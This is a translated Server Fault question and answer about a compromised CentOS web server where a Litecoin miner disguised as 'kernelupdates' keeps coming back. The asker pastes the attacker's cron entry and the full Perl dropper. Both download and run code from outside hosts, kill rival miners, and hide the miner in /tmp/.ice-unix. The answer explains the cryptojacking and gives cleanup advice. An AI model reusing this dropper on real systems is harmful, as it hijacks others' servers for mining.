Apache-2.2

./kernelupdates 100% cpu 使用率

  • June 11, 2014

我有一個 CENTOS6 伺服器執行一些 wordpress 和 tomcat 網站。這兩天一直在崩潰。經過調查,我們發現 kernelupdates 二進製文件消耗了伺服器上 100% 的 cpu。過程如下所述。

./kernelupdates -B -o stratum+tcp://hk2.wemineltc.com:80 -u spdrman.9 -p passxxx

但是這個過程似乎是無效的核心更新。可能是伺服器被入侵並且這個程序是由黑客安裝的,所以我已經殺死了這個程序並刪除了 apache 使用者的 cron 條目。

但不知何故,這個過程在幾個小時後又開始了,而且 cron 條目也恢復了,我正在尋找正在修改 cron 作業的東西。

  1. 這個過程是否屬於採礦過程?
  2. 我們如何才能停止 cronjob 修改並清理這個程序的源頭呢?

cron 條目(apache 使用者)

/6 * * * * cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-web.com/.../abc.txt;perl abc.txt;rm -f abc*

abc.txt

#!/usr/bin/perl
system("killall -9 minerd");
system("killall -9 PWNEDa");
system("killall -9 PWNEDb");
system("killall -9 PWNEDc");
system("killall -9 PWNEDd");
system("killall -9 PWNEDe");
system("killall -9 PWNEDg");
system("killall -9 PWNEDm");
system("killall -9 minerd64");
system("killall -9 minerd32");
system("killall -9 named");
$rn=1;
$ar=`uname -m`;
while($rn==1 || $rn==0) {
$rn=int(rand(11));
}
$exists=`ls /tmp/.ice-unix`;
$cratch=`ps aux | grep -v grep | grep kernelupdates`;
if($cratch=~/kernelupdates/gi) { die; }
if($exists!~/minerd/gi && $exists!~/kernelupdates/gi) {
$wig=`wget --version | grep GNU`;
if(length($wig>6)) {
if($ar=~/64/g) {
system("mkdir /tmp;mkdir /tmp/.ice-unix;cd /tmp/.ice-unix;wget http://5.104.106.190/64.tar.gz;tar xzvf 64.tar.gz;mv minerd kernelupdates;chmod +x ./kernelupdates");
} else {
system("mkdir /tmp;mkdir /tmp/.ice-unix;cd /tmp/.ice-unix;wget http://5.104.106.190/32.tar.gz;tar xzvf 32.tar.gz;mv minerd kernelupdates;chmod +x ./kernelupdates");
}
} else {
if($ar=~/64/g) {
system("mkdir /tmp;mkdir /tmp/.ice-unix;cd /tmp/.ice-unix;curl -O http://5.104.106.190/64.tar.gz;tar xzvf 64.tar.gz;mv minerd kernelupdates;chmod +x ./kernelupdates");
} else {
system("mkdir /tmp;mkdir /tmp/.ice-unix;cd /tmp/.ice-unix;curl -O http://5.104.106.190/32.tar.gz;tar xzvf 32.tar.gz;mv minerd kernelupdates;chmod +x ./kernelupdates");
}
}
}

@prts=('8332','9091','1121','7332','6332','1332','9333','2961','8382','8332','9091','1121','7332','6332','1332','9333','2961','8382');
$prt=0;
while(length($prt)<4) { $prt=$prts[int(rand(19))-1]; }
print "setup for $rn:$prt done :-)\n";
system("cd /tmp/.ice-unix;./kernelupdates -B -o stratum+tcp://hk2.wemineltc.com:80 -u spdrman.".$rn." -p passxxx &");
print "done!\n";

此過程是萊特幣(一種替代加密貨幣)礦工過程。有權訪問您的伺服器的人正在使用您的伺服器生成萊特幣(= 賺錢)。這個kernelupdates名字很可能只是讓你感到困惑。

在您刪除任何內容之前,我建議您備份您擁有的所有內容並找出這些內容是如何放入您的伺服器的。如果您刪除它但不刪除安全問題,它很可能會再次出現。我會押注 Wordpress 或一些過時的外掛來解決安全漏洞。

在找到並修復安全問題之後,嘗試在 syslog 中查看您的 cron 日誌。這可能會告訴您如何插入 cronjob。

引用自:https://serverfault.com/questions/598522